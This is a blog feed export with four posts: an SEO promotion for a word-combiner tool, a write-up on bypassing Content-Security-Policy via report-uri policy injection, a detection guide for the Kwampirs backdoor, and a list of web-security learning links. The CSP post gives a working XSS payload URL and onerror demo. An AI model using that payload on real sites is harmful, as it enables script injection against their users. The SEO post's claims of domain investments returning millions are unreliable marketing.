tag:blogger.com,1999:blog-40601651471515477722024-03-13T10:19:26.069+05:30.:: Dark Site ::.Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.comBlogger402125tag:blogger.com,1999:blog-4060165147151547772.post-9470424610319854462019-10-24T16:42:00.001+05:302019-10-25T16:03:28.590+05:30Word Combiner Can Create Hundreds of Domain Names in Seconds<div dir="ltr" style="text-align: left;" trbidi="on">
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
</h1>
<h1>
<span style="font-family: "times new roman" , serif; font-size: 12pt; font-weight: normal;">The biggest advantage all the users can get after making use
of the word combiner made by the Prepost Seo is the eradication of the mistakes
normally committed by human beings. To create words with the help of word
combinations is a very daunting task. In case you are not making use of a tool,
then you will waste your important time and energy in a combination of words as
it is a very long experience.</span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-WZKOrU8LyS0/XbGHJTr_FAI/AAAAAAAAXr4/KqEwJwAc7gM6lyDyiimifjv1hFh34TVugCLcBGAsYHQ/s1600/word.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="1024" height="250" src="https://1.bp.blogspot.com/-WZKOrU8LyS0/XbGHJTr_FAI/AAAAAAAAXr4/KqEwJwAc7gM6lyDyiimifjv1hFh34TVugCLcBGAsYHQ/s400/word.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "times new roman" , serif; font-size: 12pt;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">As you need to write all the possible and probable
combinations which you think could be appropriate. If you use our tool, then
all those combinations will be done by us. Plus, you will not miss any part
otherwise if you do this process on your own then there is a chance of making
mistakes. We will also explain to you the benefits of using the </span><span style="font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";"><a href="https://www.prepostseo.com/word-combiner">Prepostseo</a></span><span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><a href="https://www.prepostseo.com/p/factors-affecting-websites-to-rank-in-2019"> </a>word combiner tool. Kindly, keep on reading!<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">In this article, we will also inform you about the usage of
word combiner in creating domain names. For your website, you need one
particular domain. That is very logical. Why would you need multiple domain
names? This is a very real question. So, these days many people have invested
in the domain names. They have purchased in the domain names through </span><a href="https://godaddy.com/"><i style="mso-bidi-font-style: normal;"><span style="font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Go
Daddy</span></i></a><i style="mso-bidi-font-style: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt;">.</span></i><span style="font-family: "times new roman" , serif; font-size: 12.0pt;"> If in future someone is looking to
buy them, then the person can sell it at a higher price.</span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">
Make no mistakes<o:p></o:p></span></b></h2>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">It is natural that we are all full of imperfections. The most evident flaw
which every human commits is the skipping of things mistakenly. There are firms
that are trying to make a big investment in the domain names. So, if they give
the job to a person to do the combinations and merging manually. Then surely
the employee would miss many of the domain names and would not be able to let the
company invest in more domain names.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">If any of the domain names is missed by the company then
naturally the firm misses a very big chance of investment. Everyone knows how
beneficial it is these days to invest in the domain names. The use of the word
combiner tool created by the Prepost Seo will let you create so many word
combination which can help to create umpteen number of domain names. The firms
can invest all of them. In a few years’ time, the companies will itself
experience that their investment will give them millions of dollars in return.
It is because of the boom in the digital marketing industry. It is expected
that more and more people will move towards </span><span style="font-family: "times new roman" , serif;"><a href="https://www.prepostseo.com/p/mindblowing-statistics-for-a-better-digital-marketing-strategy">digital marketing</a></span><span style="font-family: "times new roman" , serif; font-size: 12.0pt;"> by 2020.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">Furthermore, it is not just for the sake of investment that
the firms make domain names. Sometimes there are conglomerates who are
willing to launch multiple brand names. For them, the creation of different
websites would work. For instance, in order to capture the market, the
conglomerate can create multiple websites with the same kind of product range
in order to capture the market. Consequently, customers will not go anywhere.
Obviously, for this matter, more domains will be helpful.<o:p></o:p></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">Simple use of word merge tool<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></b></h2>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">You do not need to own a post-graduation in information
technology. Similarly, you do not need to have the certifications in Oracle,
Python, etc. The word combiner tool can be used smoothly and easily. All you
need to do is open the website. Even if you do not have any basic computer
knowledge. It does not matter. You just need to type and you can see the most
probable combinations. Make sure to type the words separately on each line.<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">What is the usage of Word Combiner?</span></b></h2>
<h3>
<b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">
<!--[endif]--><o:p></o:p></span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">With the assistance of this tool, you can create the
contents of better quality, and as a result, the website can get better ranking
on search engine results pages. So, if your website is ranked on the first page
of Google and is at the top position then it will generate more traffic. More
people will visit it. Ask this question yourself. Will you go to the second or
third pages of Google to search for anything? The answer is <i style="mso-bidi-font-style: normal;">‘No’</i>. It is because people want to make
it easier for them. They don’t want to make it too hectic. That is why people
prefer visiting websites on the first page. The only way to achieve is by using
specific and particular keywords. So, a search engine optimizer has to make use
of word combinations carefully and skillfully. When a website is ranked at a
higher slot, more people would be convinced about clicking it. <br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3>
<b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Creation of
appropriate backlinks<o:p></o:p></span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">If appropriate and proper backlinks are created then they naturally increase
the prospects of the websites as soon as possible. It is not something that takes ages. The process of backlinking involves hyperlinking specifically in
your content to link to a particular website. With the help of a guest post, the
backlinks can be established. Those guest posts must have the best content
quality with the appropriate keywords. It is good to adjust more and more
keyword combinations in order to let the major searches by the users.<br /><o:p></o:p></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">Different stages involved in the process</span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;"><o:p> </o:p></span></b></h2>
<div class="MsoNormal">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">The Prepost Seo has manufactured a very easy to use
tools. The tool delivers the result in a matter of seconds. All the existing
possibilities will be presented to you. If you are a search engine optimizer or
just a layman you can see the possibilities of combinations.</span><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;"> Please, follow the steps mentioned
and explained below:<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3 style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: windowtext; font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Pick a reliable word combiner tool<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">We suggest you decide this part very carefully and not to
rush. The combining tools available on the internet only produce inefficient
and insufficient results. There would be nothing different in their results.
Try to select the proper kind of tool.<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3 style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: windowtext; font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Picking the right keywords</span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">
The tool will only work when you have used the right kind of keywords. In case
of keywords being missed then the tool will not work properly. The inappropriate
combinations will appear as a result. <br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3 style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: windowtext; font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Combine the keywords</span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">
This is the final part and if you are serious then you should know that this
part can even decide the future of your website. Do not take risks or chances.
Please, make sure that the keywords have not been missed. We suggest you use
the maximum number of possible combinations that appear when you click on the
word <i style="mso-bidi-font-style: normal;">‘Combine’</i>. It will generate more
customers to your website. Write all the words separately and properly in the
box of the text present on the website. Finally, you need to click on the word
‘<i style="mso-bidi-font-style: normal;">Combine’.</i><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background-color: white; border: 1pt none; font-family: "georgia" , serif; font-size: 14.6667px; padding: 0cm; text-align: justify;">Author Bio: Asad Shehzad writes SEO articles for online business marketers and SEO tools users to make their Google rankings surge. His articles have appeared in a number of websites i.e., <i><u>eLearning Industry</u></i>, <i><u>Calculators.tech</u></i> and <i><u>Inside Tech Box</u></i>. He contributes articles about digital marketing, SEO techniques, and tech regularly to </span><b style="background-color: white; color: #222222; font-family: Calibri, sans-serif; font-size: 14.6667px; text-align: justify;"><i><u>Prepostseo.com</u></i></b></div>
</div>
Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-56629985497553651612019-10-14T22:37:00.002+05:302019-10-15T12:19:52.607+05:30How to perform CSP Bypass | techniques.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
During one of my recent security testing, I came across a
very interesting scenario where some token was passing using GET requests. Of course
I can sense some interesting things here. For the protection, this application
was having almost all security headers that you will find in modern web
application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-JTAEDjQFL2Q/XaSqVSLaiVI/AAAAAAAAXiU/geHp1i0Gl7ErB6mkWZ1POKqUpp5p3C1bACLcBGAsYHQ/s1600/content-security-policy.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1200" height="336" src="https://1.bp.blogspot.com/-JTAEDjQFL2Q/XaSqVSLaiVI/AAAAAAAAXiU/geHp1i0Gl7ErB6mkWZ1POKqUpp5p3C1bACLcBGAsYHQ/s640/content-security-policy.jpg" width="640" /></a></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="MsoNormal">
One of the headers that grab my attention was CSP.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
https://www.xyz.com/upload/content/info/data/csp?<span style="box-sizing: border-box;">parameter=<span style="color: red;"><b>tokens</b></span></span></div>
<div class="MsoNormal">
<span style="box-sizing: border-box;"><br /></span></div>
<div class="MsoNormal">
For those who don’t know what is CSP can go through this good
url.</div>
<div class="MsoNormal">
<a href="https://www.netsparker.com/blog/web-security/content-security-policy/">CSP Netsparker Read</a> </div>
<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP">Mozilla CSP Read</a><br />
In simple word, CSP is used to prevent attacks like XSS, mix
content security issues or things that lead to code injection into trusted
resources.<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Talking about in my target I noticed headers like.<span style="color: #333333; font-family: "consolas"; font-size: 10.0pt; line-height: 107%;"></span></div>
<div style="background: whitesmoke; border: solid #CCCCCC 1.0pt; margin-left: 15.0pt; margin-right: 15.0pt; mso-border-alt: solid #CCCCCC .75pt; mso-element: para-border-div; padding: 7.0pt 7.0pt 7.0pt 7.0pt;">
<div class="MsoNormal" style="background: whitesmoke; border: none; line-height: normal; margin-bottom: 22.5pt; mso-border-alt: solid #CCCCCC .75pt; mso-padding-alt: 7.0pt 7.0pt 7.0pt 7.0pt; padding: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; word-break: break-all;">
<span style="background: white; color: #333332; font-family: "courier";">Content-Security-Policy: default-src
'self' https://*.xyz.com https://www.xyz.com 'unsafe-inline';img-src https:
data:;object-src 'none'; report-uri /upload/content/info/data/csp?</span><span class="red"><b><span style="box-sizing: border-box;"><span style="color: #990000;">parameter=tokens</span></span></b></span><span style="color: #333333; font-family: "consolas"; font-size: 11.5pt;"></span></div>
</div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Xyz.com we can see it was pulling the token in GET
request and embedding to headers into <span style="mso-spacerun: yes;"> </span>report-uri directive of their CSP. So if we inject
anything there it will go into csp part.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">There is a nice write up where I read about a <a href="https://portswigger.net/research/bypassing-csp-with-policy-injection">similar case</a> so I thought of trying something similar .so I
used the semicolon and dash symbol <span style="mso-spacerun: yes;"> </span>to
inject into CSP.</span></div>
<div style="background: whitesmoke; border: solid #CCCCCC 1.0pt; margin-left: 15.0pt; margin-right: 15.0pt; mso-border-alt: solid #CCCCCC .75pt; mso-element: para-border-div; padding: 7.0pt 7.0pt 7.0pt 7.0pt;">
<div class="MsoNormal" style="background: whitesmoke; border: none; line-height: normal; margin-bottom: 22.5pt; mso-border-alt: solid #CCCCCC .75pt; mso-padding-alt: 7.0pt 7.0pt 7.0pt 7.0pt; padding: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; word-break: break-all;">
Content-Security-Policy:
default-src 'self' https://*.xyz.com https://www.xyz.com 'unsafe-inline';img-src
https: data:;object-src 'none'; report-uri /upload/content/info/data/csp?<span style="box-sizing: border-box;">parameter=<span style="color: #990000;"><b>tokens;-abc</b></span></span></div>
</div>
<div style="background: white;">
<br /></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Now that it's working let's create POC. Chrome by
default ignores invalid directives and we have our injection point is getting
embedded to end of the policy.so let's override the directives. </span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Well, many directives needed a hit
and trial approach. Like</span></div>
<pre style="background: white; margin-bottom: 12.0pt; margin-left: 0in; margin-right: 0in; margin-top: 12.0pt;"><span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">directive-name<span style="mso-spacerun: yes;"> </span>= "script-src-elem"</span></pre>
<pre style="background: white; margin-bottom: 12.0pt; margin-left: 0in; margin-right: 0in; margin-top: 12.0pt;"><span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">directive-name<span style="mso-spacerun: yes;"> </span>= "img-src"</span></pre>
<pre style="background: white; margin-bottom: 12.0pt; margin-left: 0in; margin-right: 0in; margin-top: 12.0pt;"><span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">directive-name<span style="mso-spacerun: yes;"> </span>= "object-src"</span></pre>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">and many checks here </span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><span style="color: windowtext; text-decoration: none; text-underline: none;"><a href="https://w3c.github.io/webappsec-csp/#csp-directives">CSP Directives</a></span></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">you can use any directives that work for you. <span style="mso-spacerun: yes;"> </span>I used one of<span style="mso-spacerun: yes;">
</span>them script-src-elem.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">The </span><i>script-src-Elem</i> directive
applies to all script requests and script blocks. Attributes that execute
script (inline event handlers) are controlled via script-src-attr. So as per our desired policy to attack would be.</div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Content-Security-Policy: script-src-elem
'none'; script-src-attr 'unsafe-inline'</span></div>
<div style="-webkit-text-stroke-width: 0px; background: white; box-sizing: border-box; font-variant-caps: normal; font-variant-ligatures: normal; margin: calc(0.5 * var(--spacingbase)) 0; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><script>alert("Will
be Blocked")</script><br />
<img src=X onerror="alert('Can run happily')">demo</a></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">This directive overwrite existing script-src (which
most directives behave)so you can bypass CSP easily.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">The interesting thing about this directive is
that it will overwrite existing script-src directives! So you can use it to
bypass CSP provided you have policy injection</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">So the payload will be </span></div>
<div style="background: white;">
<span style="color: red; font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><b><span style="color: red;"><span style="font-size: 12pt; text-decoration: none;"><a href="https://www.xyz.com/upload/content/info/data/csp?token=%3b%2dscript-src-elem+*&param=%3cimg+src=%22uploadedserver/xsspayload.js%22%3e%3c/img">https://www.xyz.com/upload/content/info/data/csp?parameter=%3b%2dscript-src-elem+*&param=<img+src="XSS payload"></img</a></span>></span></b><span style="color: red;"></span></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">so just by implementing the security doesn’t always
help to make your product secure, of course, it adds a defense level but not 100%
.hope you liked it.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Thanks for reading have a nice time ahead.</span></div>
<div class="MsoNormal">
<br /></div>
<br /></div>
Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-56863348270124390452019-05-15T16:01:00.002+05:302019-10-14T22:44:24.022+05:30Health Care Malware Kwampirs in Details<div dir="ltr" style="text-align: left;" trbidi="on">
This post is about kwampirs malware which is targeting health care malware majorly, in this post I will share my recent experience with this malware identification as well as tips to make your system free from this malware.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-HHkhziB75cs/XNvpDGRFrNI/AAAAAAAAUfU/QvgAJVDdE28cYEQShnfy2fsmFf8KMkj4wCLcBGAs/s1600/kwampirs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1181" height="276" src="https://4.bp.blogspot.com/-HHkhziB75cs/XNvpDGRFrNI/AAAAAAAAUfU/QvgAJVDdE28cYEQShnfy2fsmFf8KMkj4wCLcBGAs/s640/kwampirs.jpg" width="640" /></a></div>
<h2>
About Kwampirs:</h2>
<br />
Kwampirs is basically a backdoor trojan used by hackers to gain remote access to compromised computers. When executed, the Trojan decrypts and extracts a copy of its main DLL payload. Kwampirs target WMI performance adapter service present in windows and upon infection it makes the service as WMI Performance Adapter Extension (WmiApSrvEx) type autostart.It only targets windows system that doesn't any sort of security prevention mechanism such as the latest antivirus.It doesn't have anything to deal with Linux/Mac environment.<br />
<br />
<h2>
How to check for kwampirs infection?</h2>
In your system go run (win+R) type services.msc.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-yaoJKluEd2c/XNvmey8tQ0I/AAAAAAAAUfA/LUXWsv8ohf8jZBxDlko5Gg_YBdANCkGUwCLcBGAs/s1600/service.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="259" data-original-width="404" height="205" src="https://2.bp.blogspot.com/-yaoJKluEd2c/XNvmey8tQ0I/AAAAAAAAUfA/LUXWsv8ohf8jZBxDlko5Gg_YBdANCkGUwCLcBGAs/s320/service.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Check for the service WmiApSrvEx (<b>WMI Performance Adapter Extension</b>) if it is in running /stopped state means it is infected with kwampirs.<br />
<br />
<a href="https://3.bp.blogspot.com/-t1aHEKBgO7o/XNvmi-wDjII/AAAAAAAAUfE/YSbWM9rfpkIqKbTbf29f_tt_UxQvPzsBACLcBGAs/s1600/infection.jpg" imageanchor="1"><img border="0" data-original-height="321" data-original-width="593" height="173" src="https://3.bp.blogspot.com/-t1aHEKBgO7o/XNvmi-wDjII/AAAAAAAAUfE/YSbWM9rfpkIqKbTbf29f_tt_UxQvPzsBACLcBGAs/s320/infection.jpg" width="320" /></a><br />
<br />
You can also check for the infection using the registry.<br />
<b><br />
Key Path:</b> <i>CurrentControlSet\Services\WmiApSrvEx\</i><br />
<b>Path:</b> <i>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmiApSrvEx</i><br />
<br />
Not only that you can also have a look in system folder such as c:\Windows\System32\ & C:\windows\SYSWOW64 for service name (.exe)<br />
wmiapsrvce<br />
wmipsrvce<br />
wmiapsrvcep<br />
wmiapsvrce<br />
etc or dll <br />
wmiamgmt<br />
wmiassn<br />
wmipadp<br />
<br />
Also some .PNF files are associated with the malware:<br />
C:\Windows\inf\mtmndkb32.pnf<br />
C:\Windows\inf\digirps.pnf<br />
Etc<br />
<br />
<h2>
Target Systems :</h2>
A system with no Antivirus protection.<br />
Older XP Or server 2000/2008 system which is not managed properly.<br />
<br />
<h2>
Steps to Make your network Kwampirs Infection Free:</h2>
Make sure all the system are having the latest antivirus protection.<br />
If a certain group system such as XP where you can't have antivirus protection make sure they are operated in an isolated network.<br />
<br />
Hope these post help you to know details about kwampirs.<br />
<br />
Please do provide a view on this, if you have any query i will definitely try my level best to answer.</div>
Chandrakanthttp://www.blogger.com/profile/16213734564468622554noreply@blogger.com0tag:blogger.com,1999:blog-4060165147151547772.post-32166341052620558132016-03-30T12:31:00.000+05:302016-04-07T17:04:06.420+05:30Learning Security Testing : For Beginners Hi friends,its been long time since i have't posted some thing so here is some thing that will help you for sure.There are many people out there/students who ask me lot of time i want to learn this security stuff from where i should start.<br />
<br />
again let me clearly tell you this web site contains many link pick any one that will be help full to you.now i am making some structured urls from which you can easily learn many things .remember these are all for technical purpose only :).<br />
<a href="https://1.bp.blogspot.com/-VyKn_TZ5p18/Vvt5qQfvU1I/AAAAAAAAHP8/Cccy3mxFEWcTEAkioypBco7EY1-o5P7eg/s1600/Beginner.jpg" imageanchor="1" ><img border="0" src="https://1.bp.blogspot.com/-VyKn_TZ5p18/Vvt5qQfvU1I/AAAAAAAAHP8/Cccy3mxFEWcTEAkioypBco7EY1-o5P7eg/s320/Beginner.jpg" /></a><br />
so here we go for Web application security part.<br />
Learn the fundamental/primary attacks.<br />
<br />
<b>-XSS(cross site scripting )</b><br />
<br />
<li>Beginners tutorial on XSS :<a href="http://excess-xss.com/">See this link</a><br />
<li>Google XSS learning Tutorials: <a href="https://www.google.com/about/appsecurity/learning/xss/">See this link</a><br />
<li>Advance attacks bypass XSS Filters/IDS:<a href="https://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf">See this book</a><br />
<br />
<b>-CSRF(Cross Site request Forgery)</b><br />
<br />
Many beginner find this slight difficult to understand so here below link for simple explanation.<br />
<li>How to find CSRF and Preventing <a href="http://blackhat.com/presentations/bh-usa-06/BH-US-06-Gallagher.pdf">Download this book</a><br />
<li>exploiting/attacking with CSRF Vulnerability <a href="http://tipstrickshack.blogspot.com/2012/10/how-to-exploit-csfr-vulnerabilitycsrf.html">See this link</a><br />
<br />
<br />
<b>-SQL Injection</b><br />
<br />
<li>Introduction to SQL Injection error based sqli: <a href="https://prakharprasad.com/introduction-to-sql-injection-and-exploitation-mysql-5-error-based/">See this link</a> <br />
<li>MSSQL Injection Complete Tutorial- <a href="https://www.exploit-db.com/papers/12975/">See this link</a><br />
<li>Everything you wanted to know about SQL injection - <a href="http://www.troyhunt.com/2013/07/everything-you-wanted-to-know-about-sql.html">See this link</a><br />
<br />
<br />
<b>Remote Code/Command Execution</b><br />
<br />
<li>How to find RCE in scripts (with examples)- <a href="https://www.exploit-db.com/papers/12885/">See this link</a><br />
<li>Yahoo vulnerability LFI Converted to RCE (patched)- <a href="https://soroush.secproject.com/blog/2013/10/yahoo-bug-bounty-program-lfi-reported-and-patched/">See this link</a><br />
<li>Remote Code Execution in Elasticsearch - CVE-2015-1427 Deep research <a href="http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/">See this link</a><br />
<b><br />
XML external entity attack </b><br />
<br />
<li>How to detect XXE - <a href="http://www.christian-schneider.net/GenericXxeDetection.html">See this link</a><br />
<li>XML Out-Of-Band Data Retrieval research Black Hat 2013 - <a href="https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf">Download PDF</a><br />
<li>SSRF vs. Business-critical applications: XXE tunneling in SAP - <a href="https://erpscan.com/wp-content/uploads/publications/SSRF-vs-Businness-critical-applications-final-edit.pdf">Download PDF</a><br />
<li>What you didn’t know about XXE -<a href="http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf"> Download PDF</a><br />
<br />
<b>Other few popular attacks on web application</b> <br />
<br />
<li>Server side request forgery Attacks - <a href="http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities">Slides</a><br />
<li>Cross Site Port Attacks - <a href="http://ibreak.software/2013/05/10/xspa-ssrf-bug-with-facebooks-developer-web-application/">BY Riyaz</a><br />
<li>Hunting for Top Bounties - <a href="https://www.youtube.com/watch?v=mQjTgDuLsp4">YouTube link</a><br />
<li>How to steal and modify data using Business Logic flaws - <a href="http://www.slideshare.net/fransrosen/how-to-steal-and-modify-data-using-business-logic-flaws-insecure-direct-object-references">Slides Security for developers</a><br />
<li>Exploiting CVE-2011-2461 on google.com - <a href="http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html">See the link</a><br />
<li><a href="https://pentesterlab.com/exercises/">PentesterLab</a> - - PentesterLab provides vulnerable systems that can be used to test and understand vulnerabilities. (thanks @n0x00)<br />
<li>InjectX to find XSS - <a href="https://forum.bugcrowd.com/t/tutorial-injectx-to-find-xss/790">See the link</a> thanks @1N3<br />
<br />
Of Course there exist bugs in mobile application too so if you are interested on that you will definitely find the link more likable <br />
<br />
<b>Android Security learning <br />
</b><br />
<li>Debugging Java Applications Using JDB - <a href="http://www.androidpentesting.com/2014/12/debugging-java-applications-using-jdb.html">See the link to learn</a><br />
<li>Learn android security testing - <a href="http://resources.infosecinstitute.com/author/srinivas/">From Srinivas</a><br />
<br />
<b>iOS application testing <br />
</b><br />
<li>Setting Up a Mobile Pentesting Platform - <a href="http://resources.infosecinstitute.com/ios-application-security-part-1-setting-up-a-mobile-pentesting-platform/">Infosec Link</a><br />
<li>iOS Application Security -<a href="http://highaltitudehacks.com/">By Prateek Gianchandani</a><br />
<br />
